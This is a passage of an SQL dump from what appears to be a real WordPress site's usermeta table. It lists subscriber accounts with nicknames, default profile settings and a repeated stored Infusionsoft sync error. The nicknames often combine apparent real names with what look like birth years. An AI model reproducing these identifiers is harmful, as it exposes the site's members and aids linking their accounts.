(40018, 3070, 'nickname', 'djcraigpeter1984'),
(40019, 3070, 'first_name', ''),
(40020, 3070, 'last_name', ''),
(40021, 3070, 'description', ''),
(40022, 3070, 'rich_editing', 'true'),
(40023, 3070, 'comment_shortcuts', 'false'),
(40024, 3070, 'admin_color', 'fresh'),
(40025, 3070, 'use_ssl', '0'),
(40026, 3070, 'show_admin_bar_front', 'true'),
(40027, 3070, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40028, 3070, 'cyb_user_level', '0'),
(40029, 3070, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40030, 3070, 'default_password_nag', '1'),
(40031, 3071, 'nickname', 'mountain_keen1998'),
(40032, 3071, 'first_name', ''),
(40033, 3071, 'last_name', ''),
(40034, 3071, 'description', ''),
(40035, 3071, 'rich_editing', 'true'),
(40036, 3071, 'comment_shortcuts', 'false'),
(40037, 3071, 'admin_color', 'fresh'),
(40038, 3071, 'use_ssl', '0'),
(40039, 3071, 'show_admin_bar_front', 'true'),
(40040, 3071, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40041, 3071, 'cyb_user_level', '0'),
(40042, 3071, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40043, 3071, 'default_password_nag', '1'),
(40044, 3072, 'nickname', 'bigggbrutis2002'),
(40045, 3072, 'first_name', ''),
(40046, 3072, 'last_name', ''),
(40047, 3072, 'description', ''),
(40048, 3072, 'rich_editing', 'true'),
(40049, 3072, 'comment_shortcuts', 'false'),
(40050, 3072, 'admin_color', 'fresh'),
(40051, 3072, 'use_ssl', '0'),
(40052, 3072, 'show_admin_bar_front', 'true'),
(40053, 3072, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40054, 3072, 'cyb_user_level', '0'),
(40055, 3072, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40056, 3072, 'default_password_nag', '1'),
(40057, 3073, 'nickname', 'willrodtfordfinance1990'),
(40058, 3073, 'first_name', ''),
(40059, 3073, 'last_name', ''),
(40060, 3073, 'description', ''),
(40061, 3073, 'rich_editing', 'true'),
(40062, 3073, 'comment_shortcuts', 'false'),
(40063, 3073, 'admin_color', 'fresh'),
(40064, 3073, 'use_ssl', '0'),
(40065, 3073, 'show_admin_bar_front', 'true'),
(40066, 3073, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40067, 3073, 'cyb_user_level', '0'),
(40068, 3073, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40069, 3073, 'default_password_nag', '1'),
(40070, 3074, 'nickname', 'susielevitt2004'),
(40071, 3074, 'first_name', ''),
(40072, 3074, 'last_name', ''),
(40073, 3074, 'description', ''),
(40074, 3074, 'rich_editing', 'true'),
(40075, 3074, 'comment_shortcuts', 'false'),
(40076, 3074, 'admin_color', 'fresh'),
(40077, 3074, 'use_ssl', '0'),
(40078, 3074, 'show_admin_bar_front', 'true'),
(40079, 3074, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40080, 3074, 'cyb_user_level', '0'),
(40081, 3074, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40082, 3074, 'default_password_nag', '1'),
(40083, 3075, 'nickname', 'ctking20082006'),
(40084, 3075, 'first_name', ''),
(40085, 3075, 'last_name', ''),
(40086, 3075, 'description', ''),
(40087, 3075, 'rich_editing', 'true'),
(40088, 3075, 'comment_shortcuts', 'false'),
(40089, 3075, 'admin_color', 'fresh'),
(40090, 3075, 'use_ssl', '0'),
(40091, 3075, 'show_admin_bar_front', 'true'),
(40092, 3075, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40093, 3075, 'cyb_user_level', '0'),
(40094, 3075, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40095, 3075, 'default_password_nag', '1'),
(40096, 3076, 'nickname', 'tishl1974'),
(40097, 3076, 'first_name', ''),
(40098, 3076, 'last_name', ''),
(40099, 3076, 'description', ''),
(40100, 3076, 'rich_editing', 'true'),
(40101, 3076, 'comment_shortcuts', 'false'),
(40102, 3076, 'admin_color', 'fresh'),
(40103, 3076, 'use_ssl', '0'),
(40104, 3076, 'show_admin_bar_front', 'true'),
(40105, 3076, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40106, 3076, 'cyb_user_level', '0'),
(40107, 3076, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40108, 3076, 'default_password_nag', '1'),
(40109, 3077, 'nickname', 'mngelinas1969'),
(40110, 3077, 'first_name', ''),
(40111, 3077, 'last_name', ''),
(40112, 3077, 'description', ''),
(40113, 3077, 'rich_editing', 'true'),
(40114, 3077, 'comment_shortcuts', 'false'),
(40115, 3077, 'admin_color', 'fresh'),
(40116, 3077, 'use_ssl', '0'),
(40117, 3077, 'show_admin_bar_front', 'true'),
(40118, 3077, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40119, 3077, 'cyb_user_level', '0'),
(40120, 3077, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40121, 3077, 'default_password_nag', '1'),
(40122, 3078, 'nickname', 'dan.keller622009'),
(40123, 3078, 'first_name', ''),
(40124, 3078, 'last_name', ''),
(40125, 3078, 'description', ''),
(40126, 3078, 'rich_editing', 'true'),
(40127, 3078, 'comment_shortcuts', 'false'),
(40128, 3078, 'admin_color', 'fresh'),
(40129, 3078, 'use_ssl', '0'),
(40130, 3078, 'show_admin_bar_front', 'true'),
(40131, 3078, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40132, 3078, 'cyb_user_level', '0'),
(40133, 3078, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40134, 3078, 'default_password_nag', '1'),
(40135, 3079, 'nickname', 'jedwards2252000'),
(40136, 3079, 'first_name', ''),
(40137, 3079, 'last_name', ''),
(40138, 3079, 'description', ''),
(40139, 3079, 'rich_editing', 'true'),
(40140, 3079, 'comment_shortcuts', 'false'),
(40141, 3079, 'admin_color', 'fresh'),
(40142, 3079, 'use_ssl', '0'),
(40143, 3079, 'show_admin_bar_front', 'true'),
(40144, 3079, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40145, 3079, 'cyb_user_level', '0'),
(40146, 3079, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40147, 3079, 'default_password_nag', '1'),
(40148, 3080, 'nickname', 'bkuster581971'),
(40149, 3080, 'first_name', ''),
(40150, 3080, 'last_name', ''),
(40151, 3080, 'description', ''),
(40152, 3080, 'rich_editing', 'true'),
(40153, 3080, 'comment_shortcuts', 'false'),
(40154, 3080, 'admin_color', 'fresh'),
(40155, 3080, 'use_ssl', '0'),
(40156, 3080, 'show_admin_bar_front', 'true'),
(40157, 3080, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40158, 3080, 'cyb_user_level', '0'),
(40159, 3080, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40160, 3080, 'default_password_nag', '1'),
(40161, 3081, 'nickname', 'lwaustria1971'),
(40162, 3081, 'first_name', ''),
(40163, 3081, 'last_name', ''),
(40164, 3081, 'description', ''),
(40165, 3081, 'rich_editing', 'true'),
(40166, 3081, 'comment_shortcuts', 'false'),
(40167, 3081, 'admin_color', 'fresh'),
(40168, 3081, 'use_ssl', '0'),
(40169, 3081, 'show_admin_bar_front', 'true'),
(40170, 3081, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40171, 3081, 'cyb_user_level', '0'),
(40172, 3081, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40173, 3081, 'default_password_nag', '1'),
(40174, 3082, 'nickname', 'glsolivan1965'),
(40175, 3082, 'first_name', ''),
(40176, 3082, 'last_name', ''),
(40177, 3082, 'description', ''),
(40178, 3082, 'rich_editing', 'true'),
(40179, 3082, 'comment_shortcuts', 'false'),
(40180, 3082, 'admin_color', 'fresh'),
(40181, 3082, 'use_ssl', '0'),
(40182, 3082, 'show_admin_bar_front', 'true'),
(40183, 3082, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40184, 3082, 'cyb_user_level', '0'),
(40185, 3082, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40186, 3082, 'default_password_nag', '1'),
(40187, 3083, 'nickname', 'joelhoglund11969'),
(40188, 3083, 'first_name', ''),
(40189, 3083, 'last_name', ''),
(40190, 3083, 'description', ''),
(40191, 3083, 'rich_editing', 'true'),
(40192, 3083, 'comment_shortcuts', 'false'),
(40193, 3083, 'admin_color', 'fresh'),
(40194, 3083, 'use_ssl', '0'),
(40195, 3083, 'show_admin_bar_front', 'true'),
(40196, 3083, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40197, 3083, 'cyb_user_level', '0'),
(40198, 3083, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40199, 3083, 'default_password_nag', '1'),
(40200, 3084, 'nickname', 'channon631950'),
(40201, 3084, 'first_name', ''),
(40202, 3084, 'last_name', ''),
(40203, 3084, 'description', ''),
(40204, 3084, 'rich_editing', 'true'),
(40205, 3084, 'comment_shortcuts', 'false'),
(40206, 3084, 'admin_color', 'fresh'),
(40207, 3084, 'use_ssl', '0'),
(40208, 3084, 'show_admin_bar_front', 'true'),
(40209, 3084, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40210, 3084, 'cyb_user_level', '0'),
(40211, 3084, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40212, 3084, 'default_password_nag', '1'),
(40213, 3085, 'nickname', 'hanifmm051984'),
(40214, 3085, 'first_name', ''),
(40215, 3085, 'last_name', ''),
(40216, 3085, 'description', ''),
(40217, 3085, 'rich_editing', 'true'),
(40218, 3085, 'comment_shortcuts', 'false'),
(40219, 3085, 'admin_color', 'fresh'),
(40220, 3085, 'use_ssl', '0'),
(40221, 3085, 'show_admin_bar_front', 'true'),
(40222, 3085, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40223, 3085, 'cyb_user_level', '0'),
(40224, 3085, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40225, 3085, 'default_password_nag', '1'),
(40226, 3086, 'nickname', 'massimomodugno801966'),
(40227, 3086, 'first_name', ''),
(40228, 3086, 'last_name', ''),
(40229, 3086, 'description', ''),
(40230, 3086, 'rich_editing', 'true'),
(40231, 3086, 'comment_shortcuts', 'false'),
(40232, 3086, 'admin_color', 'fresh'),
(40233, 3086, 'use_ssl', '0'),
(40234, 3086, 'show_admin_bar_front', 'true'),
(40235, 3086, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40236, 3086, 'cyb_user_level', '0'),
(40237, 3086, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40238, 3086, 'default_password_nag', '1'),
(40239, 3087, 'nickname', 'toddsplace802009'),
(40240, 3087, 'first_name', ''),
(40241, 3087, 'last_name', ''),
(40242, 3087, 'description', ''),
(40243, 3087, 'rich_editing', 'true'),
(40244, 3087, 'comment_shortcuts', 'false'),
(40245, 3087, 'admin_color', 'fresh'),
(40246, 3087, 'use_ssl', '0'),
(40247, 3087, 'show_admin_bar_front', 'true'),
(40248, 3087, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40249, 3087, 'cyb_user_level', '0'),
(40250, 3087, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40251, 3087, 'default_password_nag', '1'),
(40252, 3088, 'nickname', 'xenonzerox1955'),
(40253, 3088, 'first_name', ''),
(40254, 3088, 'last_name', ''),
(40255, 3088, 'description', ''),
(40256, 3088, 'rich_editing', 'true'),
(40257, 3088, 'comment_shortcuts', 'false'),
(40258, 3088, 'admin_color', 'fresh'),
(40259, 3088, 'use_ssl', '0'),
(40260, 3088, 'show_admin_bar_front', 'true'),
(40261, 3088, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40262, 3088, 'cyb_user_level', '0'),
(40263, 3088, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40264, 3088, 'default_password_nag', '1'),
(40265, 3089, 'nickname', 'reter23xx1970'),
(40266, 3089, 'first_name', ''),
(40267, 3089, 'last_name', ''),
(40268, 3089, 'description', ''),
(40269, 3089, 'rich_editing', 'true'),
(40270, 3089, 'comment_shortcuts', 'false'),
(40271, 3089, 'admin_color', 'fresh'),
(40272, 3089, 'use_ssl', '0'),
(40273, 3089, 'show_admin_bar_front', 'true'),
(40274, 3089, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40275, 3089, 'cyb_user_level', '0'),
(40276, 3089, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40277, 3089, 'default_password_nag', '1'),
(40278, 3090, 'nickname', 'robynstepps1962'),
(40279, 3090, 'first_name', ''),
(40280, 3090, 'last_name', ''),
(40281, 3090, 'description', ''),
(40282, 3090, 'rich_editing', 'true'),
(40283, 3090, 'comment_shortcuts', 'false'),
(40284, 3090, 'admin_color', 'fresh'),
(40285, 3090, 'use_ssl', '0'),
(40286, 3090, 'show_admin_bar_front', 'true'),
(40287, 3090, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40288, 3090, 'cyb_user_level', '0'),
(40289, 3090, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40290, 3090, 'default_password_nag', '1'),
(40291, 3091, 'nickname', 'peterjiandonghuang1996'),
(40292, 3091, 'first_name', ''),
(40293, 3091, 'last_name', ''),
(40294, 3091, 'description', ''),
(40295, 3091, 'rich_editing', 'true'),
(40296, 3091, 'comment_shortcuts', 'false'),
(40297, 3091, 'admin_color', 'fresh'),
(40298, 3091, 'use_ssl', '0'),
(40299, 3091, 'show_admin_bar_front', 'true'),
(40300, 3091, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40301, 3091, 'cyb_user_level', '0'),
(40302, 3091, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40303, 3091, 'default_password_nag', '1'),
(40304, 3092, 'nickname', 'matt456481982'),
(40305, 3092, 'first_name', ''),
(40306, 3092, 'last_name', ''),
(40307, 3092, 'description', ''),
(40308, 3092, 'rich_editing', 'true'),
(40309, 3092, 'comment_shortcuts', 'false'),
(40310, 3092, 'admin_color', 'fresh'),
(40311, 3092, 'use_ssl', '0'),
(40312, 3092, 'show_admin_bar_front', 'true'),
(40313, 3092, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40314, 3092, 'cyb_user_level', '0'),
(40315, 3092, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40316, 3092, 'default_password_nag', '1'),
(40317, 3093, 'nickname', 'lawrenceriley.riley1978'),
(40318, 3093, 'first_name', ''),
(40319, 3093, 'last_name', ''),
(40320, 3093, 'description', ''),
(40321, 3093, 'rich_editing', 'true'),
(40322, 3093, 'comment_shortcuts', 'false'),
(40323, 3093, 'admin_color', 'fresh'),
(40324, 3093, 'use_ssl', '0'),
(40325, 3093, 'show_admin_bar_front', 'true'),
(40326, 3093, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40327, 3093, 'cyb_user_level', '0'),
(40328, 3093, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40329, 3093, 'default_password_nag', '1'),
(40330, 3094, 'nickname', 'emesekk1950'),
(40331, 3094, 'first_name', ''),
(40332, 3094, 'last_name', ''),
(40333, 3094, 'description', ''),
(40334, 3094, 'rich_editing', 'true'),
(40335, 3094, 'comment_shortcuts', 'false'),
(40336, 3094, 'admin_color', 'fresh'),
(40337, 3094, 'use_ssl', '0'),
(40338, 3094, 'show_admin_bar_front', 'true'),
(40339, 3094, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40340, 3094, 'cyb_user_level', '0'),
(40341, 3094, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40342, 3094, 'default_password_nag', '1'),
(40343, 3095, 'nickname', 'jeff1961'),
(40344, 3095, 'first_name', ''),
(40345, 3095, 'last_name', ''),
(40346, 3095, 'description', ''),
(40347, 3095, 'rich_editing', 'true'),
(40348, 3095, 'comment_shortcuts', 'false'),
(40349, 3095, 'admin_color', 'fresh'),
(40350, 3095, 'use_ssl', '0'),
(40351, 3095, 'show_admin_bar_front', 'true'),
(40352, 3095, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40353, 3095, 'cyb_user_level', '0'),
(40354, 3095, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40355, 3095, 'default_password_nag', '1'),
(40356, 3096, 'nickname', 'acarr2601998'),
(40357, 3096, 'first_name', ''),
(40358, 3096, 'last_name', ''),
(40359, 3096, 'description', ''),
(40360, 3096, 'rich_editing', 'true'),
(40361, 3096, 'comment_shortcuts', 'false'),
(40362, 3096, 'admin_color', 'fresh'),
(40363, 3096, 'use_ssl', '0'),
(40364, 3096, 'show_admin_bar_front', 'true'),
(40365, 3096, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40366, 3096, 'cyb_user_level', '0'),
(40367, 3096, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40368, 3096, 'default_password_nag', '1'),
(40369, 3097, 'nickname', 'ncampb81963'),
(40370, 3097, 'first_name', ''),
(40371, 3097, 'last_name', ''),
(40372, 3097, 'description', ''),
(40373, 3097, 'rich_editing', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(40374, 3097, 'comment_shortcuts', 'false'),
(40375, 3097, 'admin_color', 'fresh'),
(40376, 3097, 'use_ssl', '0'),
(40377, 3097, 'show_admin_bar_front', 'true'),
(40378, 3097, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40379, 3097, 'cyb_user_level', '0'),
(40380, 3097, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40381, 3097, 'default_password_nag', '1'),
(40382, 3098, 'nickname', 'bryand1331991'),
(40383, 3098, 'first_name', ''),
(40384, 3098, 'last_name', ''),
(40385, 3098, 'description', ''),
(40386, 3098, 'rich_editing', 'true'),
(40387, 3098, 'comment_shortcuts', 'false'),
(40388, 3098, 'admin_color', 'fresh'),
(40389, 3098, 'use_ssl', '0'),
(40390, 3098, 'show_admin_bar_front', 'true'),
(40391, 3098, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40392, 3098, 'cyb_user_level', '0'),
(40393, 3098, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40394, 3098, 'default_password_nag', '1'),
(40395, 3099, 'nickname', 'erica.ewb1951'),
(40396, 3099, 'first_name', ''),
(40397, 3099, 'last_name', ''),
(40398, 3099, 'description', ''),
(40399, 3099, 'rich_editing', 'true'),
(40400, 3099, 'comment_shortcuts', 'false'),
(40401, 3099, 'admin_color', 'fresh'),
(40402, 3099, 'use_ssl', '0'),
(40403, 3099, 'show_admin_bar_front', 'true'),
(40404, 3099, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40405, 3099, 'cyb_user_level', '0'),
(40406, 3099, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40407, 3099, 'default_password_nag', '1'),
(40408, 3100, 'nickname', 'lspodos1971'),
(40409, 3100, 'first_name', ''),
(40410, 3100, 'last_name', ''),
(40411, 3100, 'description', ''),
(40412, 3100, 'rich_editing', 'true'),
(40413, 3100, 'comment_shortcuts', 'false'),
(40414, 3100, 'admin_color', 'fresh'),
(40415, 3100, 'use_ssl', '0'),
(40416, 3100, 'show_admin_bar_front', 'true'),
(40417, 3100, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40418, 3100, 'cyb_user_level', '0'),
(40419, 3100, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40420, 3100, 'default_password_nag', '1'),
(40421, 3101, 'nickname', 'xtrasns1968'),
(40422, 3101, 'first_name', ''),
(40423, 3101, 'last_name', ''),
(40424, 3101, 'description', ''),
(40425, 3101, 'rich_editing', 'true'),
(40426, 3101, 'comment_shortcuts', 'false'),
(40427, 3101, 'admin_color', 'fresh'),
(40428, 3101, 'use_ssl', '0'),
(40429, 3101, 'show_admin_bar_front', 'true'),
(40430, 3101, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40431, 3101, 'cyb_user_level', '0'),
(40432, 3101, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40433, 3101, 'default_password_nag', '1'),
(40434, 3102, 'nickname', 'jasonwoodington1983'),
(40435, 3102, 'first_name', ''),
(40436, 3102, 'last_name', ''),
(40437, 3102, 'description', ''),
(40438, 3102, 'rich_editing', 'true'),
(40439, 3102, 'comment_shortcuts', 'false'),
(40440, 3102, 'admin_color', 'fresh'),
(40441, 3102, 'use_ssl', '0'),
(40442, 3102, 'show_admin_bar_front', 'true'),
(40443, 3102, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40444, 3102, 'cyb_user_level', '0'),
(40445, 3102, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40446, 3102, 'default_password_nag', '1'),
(40447, 3103, 'nickname', 'pgodi1982'),
(40448, 3103, 'first_name', ''),
(40449, 3103, 'last_name', ''),
(40450, 3103, 'description', ''),
(40451, 3103, 'rich_editing', 'true'),
(40452, 3103, 'comment_shortcuts', 'false'),
(40453, 3103, 'admin_color', 'fresh'),
(40454, 3103, 'use_ssl', '0'),
(40455, 3103, 'show_admin_bar_front', 'true'),
(40456, 3103, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40457, 3103, 'cyb_user_level', '0'),
(40458, 3103, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40459, 3103, 'default_password_nag', '1'),
(40460, 3104, 'nickname', 'zara_percy1977'),
(40461, 3104, 'first_name', ''),
(40462, 3104, 'last_name', ''),
(40463, 3104, 'description', ''),
(40464, 3104, 'rich_editing', 'true'),
(40465, 3104, 'comment_shortcuts', 'false'),
(40466, 3104, 'admin_color', 'fresh'),
(40467, 3104, 'use_ssl', '0'),
(40468, 3104, 'show_admin_bar_front', 'true'),
(40469, 3104, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40470, 3104, 'cyb_user_level', '0'),
(40471, 3104, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40472, 3104, 'default_password_nag', '1'),
(40473, 3105, 'nickname', 'customersupport1979'),
(40474, 3105, 'first_name', ''),
(40475, 3105, 'last_name', ''),
(40476, 3105, 'description', ''),
(40477, 3105, 'rich_editing', 'true'),
(40478, 3105, 'comment_shortcuts', 'false'),
(40479, 3105, 'admin_color', 'fresh'),
(40480, 3105, 'use_ssl', '0'),
(40481, 3105, 'show_admin_bar_front', 'true'),
(40482, 3105, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40483, 3105, 'cyb_user_level', '0'),
(40484, 3105, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40485, 3105, 'default_password_nag', '1'),
(40486, 3106, 'nickname', 'essmm851995'),
(40487, 3106, 'first_name', ''),
(40488, 3106, 'last_name', ''),
(40489, 3106, 'description', ''),
(40490, 3106, 'rich_editing', 'true'),
(40491, 3106, 'comment_shortcuts', 'false'),
(40492, 3106, 'admin_color', 'fresh'),
(40493, 3106, 'use_ssl', '0'),
(40494, 3106, 'show_admin_bar_front', 'true'),
(40495, 3106, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40496, 3106, 'cyb_user_level', '0'),
(40497, 3106, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(40498, 3106, 'default_password_nag', '1'),
(40499, 3107, 'nickname', 'lynnieq2005'),
(40500, 3107, 'first_name', ''),
(40501, 3107, 'last_name', ''),
(40502, 3107, 'description', ''),
(40503, 3107, 'rich_editing', 'true'),
(40504, 3107, 'comment_shortcuts', 'false'),
(40505, 3107, 'admin_color', 'fresh'),
(40506, 3107, 'use_ssl', '0'),
(40507, 3107, 'show_admin_bar_front', 'true'),
(40508, 3107, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(40509, 3107, 'cyb_user_level', '0'),
